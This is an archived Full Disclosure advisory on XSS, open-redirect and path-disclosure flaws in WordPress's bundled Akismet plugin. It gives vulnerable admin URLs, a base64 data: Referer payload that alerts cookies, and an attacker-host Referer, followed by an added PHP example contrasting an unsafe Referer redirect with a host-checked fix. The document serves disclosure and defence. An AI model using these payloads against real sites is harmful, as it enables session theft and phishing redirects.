Full Disclosure mailing list archives

XSS, Redirector and FPD vulnerabilities in WordPress


From: "MustLive" <mustlive () websecurity com ua>
Date: Mon, 2 Jul 2012 21:45:30 +0300

Hello list!

In June I disclosed vulnerabilities in WordPress, which I'd like to present 
to you. They take place in the Akismet plugin for WordPress, and it's a core 
plugin (since WP version 2.0), so these vulnerabilities concern WordPress 
itself. This is the first in a series of advisories concerning 
vulnerabilities in Akismet.

These are Cross-Site Scripting, Redirector and Full path disclosure 
vulnerabilities.

-------------------------
Affected products:
-------------------------

Akismet 2.5.6 and previous versions and WordPress 2.0 - 3.4.1 are 
vulnerable. Akismet 2.5.6 is bundled with the latest versions, 3.4 and 
3.4.1, of WordPress.

----------
Details:
----------

XSS (WASC-08):

On a GET request to the script 
http://site/wp-admin/edit.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/edit-comments.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/admin.php?action=akismet_recheck_queue (depending on 
the version; in WP 3.x the last address is used).

With the Referer header set. This can be done via Flash or other methods. 
Last year I wrote the article "XSS attacks via User-Agent header" 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-June/007909.html), 
and almost all of those methods can be used for the Referer header.

Referer: 
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

On IIS web servers the redirect goes via the Refresh header, and on other 
web servers via the Location header.

Redirector (URL Redirector Abuse) (WASC-38):

On a GET request to the script 
http://site/wp-admin/edit.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/edit-comments.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/admin.php?action=akismet_recheck_queue (depending on 
the version; in WP 3.x the last address is used).

With the Referer header set. This can be done via Flash or other methods.

Referer: http://attackers_site

In WP <= 2.0.11 (Akismet <= 2.0.2), due to an error in the plugin, the XSS 
and Redirector attacks don't work, but they do work with newer versions of 
the plugin in different versions of WordPress (before 3.4).

Note that in the latest version, Akismet 2.5.6 (which is bundled with WP 3.4 
and 3.4.1), these two vulnerabilities are already fixed (silently, without 
any mention in the plugin's readme.txt or in WP announcements). It looks 
like this happened after my March or April advisory about XSS and 
Redirector vulnerabilities via redirectors in WP.

Full path disclosure (WASC-13):

Due to the above-mentioned error in the plugin the XSS and Redirector 
attacks don't work, but there is an FPD on a request to the script (in old 
versions of Akismet, such as 2.0.2).

http://site/wp-admin/edit.php?page=akismet-admin&recheckqueue=1 or 
http://site/wp-admin/edit-comments.php?page=akismet-admin&recheckqueue=1 
(depending on the version of WP).

Full path disclosure (WASC-13):

If the previous FPD takes place in the account, then these FPDs don't 
require authorization.

http://site/wp-content/plugins/akismet/admin.php

http://site/wp-content/plugins/akismet/akismet.php

http://site/wp-content/plugins/akismet/legacy.php

http://site/wp-content/plugins/akismet/widget.php

------------
Timeline:
------------

2012.02.23 - found vulnerabilities in Akismet 2.5.3. Later tested in other 
versions of the plugin from different versions of WordPress.
2012.06.29 - disclosed at my site (http://websecurity.com.ua/5933/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
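The Referer-driven redirect behind the XSS and Redirector issues above, as an 
added illustration that is not part of the original advisory and not 
Akismet's or WordPress's own code: a constructed vulnerable pattern beside a 
hardened check that follows the Referer only when it is an absolute http(s) 
URL on the site's own host, so the data: payload and the foreign host quoted 
in the advisory both fall back to a fixed admin page. Function names, the 
host value "site" and the fallback page are hypothetical; in real WordPress 
code, wp_safe_redirect() performs an equivalent allowed-host check.

```php
<?php
// Added illustration, not Akismet's or WordPress's actual code.

// Vulnerable pattern: the redirect target is taken from the Referer header
// unchecked, so a "data:" URL (XSS via Location/Refresh) or a foreign host
// (open redirect) is followed as-is.
function redirect_back_unsafe(array $server): string
{
    return $server['HTTP_REFERER'] ?? 'edit-comments.php';
}

// Hardened form: follow the Referer only when it is an absolute http(s) URL
// whose host is this site; otherwise fall back to a fixed admin page.
function redirect_back_safe(array $server, string $site_host,
                            string $fallback = 'edit-comments.php'): string
{
    $referer = $server['HTTP_REFERER'] ?? '';
    $parts = ($referer === '') ? false : parse_url($referer);
    if ($parts === false) {
        return $fallback;
    }
    // Rejects data:, javascript: and scheme-relative "//host" forms,
    // which parse with a missing or non-http scheme.
    $scheme = strtolower($parts['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return $fallback;
    }
    // Compares the parsed host only, so "http://site@evil/" fails too.
    if (strcasecmp($parts['host'] ?? '', $site_host) !== 0) {
        return $fallback;
    }
    return $referer;
}

// Constructed sample Referer values: the two quoted in the advisory plus a
// scheme-relative variant and a legitimate same-site page.
$samples = [
    'data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+',
    'http://attackers_site',
    '//attackers_site/wp-admin/',
    'http://site/wp-admin/edit-comments.php?page=akismet-admin',
];
foreach ($samples as $ref) {
    $server = ['HTTP_REFERER' => $ref];
    echo "Referer: $ref\n";
    echo "  unsafe -> " . redirect_back_unsafe($server) . "\n";
    echo "  safe   -> " . redirect_back_safe($server, 'site') . "\n";
}
```

Run with `php` on the command line; only the last sample is returned 
unchanged by the hardened function, the other three yield the fallback page.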


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

